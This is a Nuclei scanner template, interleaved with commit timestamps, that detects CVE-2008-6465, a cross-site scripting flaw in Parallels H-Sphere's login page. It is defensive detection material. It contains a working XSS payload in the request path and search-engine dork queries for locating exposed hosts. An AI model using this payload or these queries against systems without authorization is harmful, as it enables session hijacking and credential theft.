2022-11-06 12:41:14 +00:00
id : CVE-2008-6465
info :
2022-12-09 21:40:18 +00:00
name : Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
2022-11-06 12:41:14 +00:00
author : edoardottt
severity : medium
description : |
2022-12-09 21:40:18 +00:00
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.
2022-11-06 12:41:14 +00:00
reference :
2022-11-12 02:55:56 +00:00
- http://www.xssing.com/index.php?x=3&y=65
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
2022-11-12 07:20:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-11-06 12:41:14 +00:00
classification :
2023-07-11 19:49:27 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score : 4.3
2022-11-06 12:41:14 +00:00
cve-id : CVE-2008-6465
2023-07-11 19:49:27 +00:00
cwe-id : CWE-79
epss-score : 0.00421
2024-03-23 09:28:19 +00:00
epss-percentile : 0.73765
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:*
2022-11-12 02:32:13 +00:00
metadata :
2022-11-12 07:20:30 +00:00
verified : true
2023-09-06 13:22:34 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : parallels
product : h-sphere
2024-06-07 10:04:29 +00:00
shodan-query :
- title:"Parallels H-Sphere
- http.title:"h-sphere"
- http.title:"parallels h-sphere"
fofa-query :
- title="h-sphere"
- title="parallels h-sphere"
google-query :
- intitle:"h-sphere"
- intitle:"parallels h-sphere"
2022-11-12 07:20:30 +00:00
tags : cve,cve2008,xss,parallels,h-sphere
2022-11-06 12:41:14 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-11-12 02:32:13 +00:00
- method : GET
path :
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
2022-11-06 12:41:14 +00:00
matchers-condition : and
matchers :
- type : word
2022-11-12 02:32:13 +00:00
part : body
2022-11-06 12:41:14 +00:00
words :
2022-11-12 02:32:13 +00:00
- '\" onfocus=alert(document.domain); autofocus'
- 'Please enter login name & password'
2022-11-12 02:37:51 +00:00
condition : and
2022-11-06 12:41:14 +00:00
- type : word
2022-11-12 02:32:13 +00:00
part : header
2022-11-06 12:41:14 +00:00
words :
2022-11-12 02:32:13 +00:00
- 'text/html'
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 490a0046304402202f5d9bbda9c856d7eac18bbe866eb3249138a90a0b6b072b3cb11cd24f4afb7102201d8c97f30783c811f77802a6f6e66471e8bc85afe7df1a619f756c7437dba8e1:922c64590222798bb761d5b6d8e72950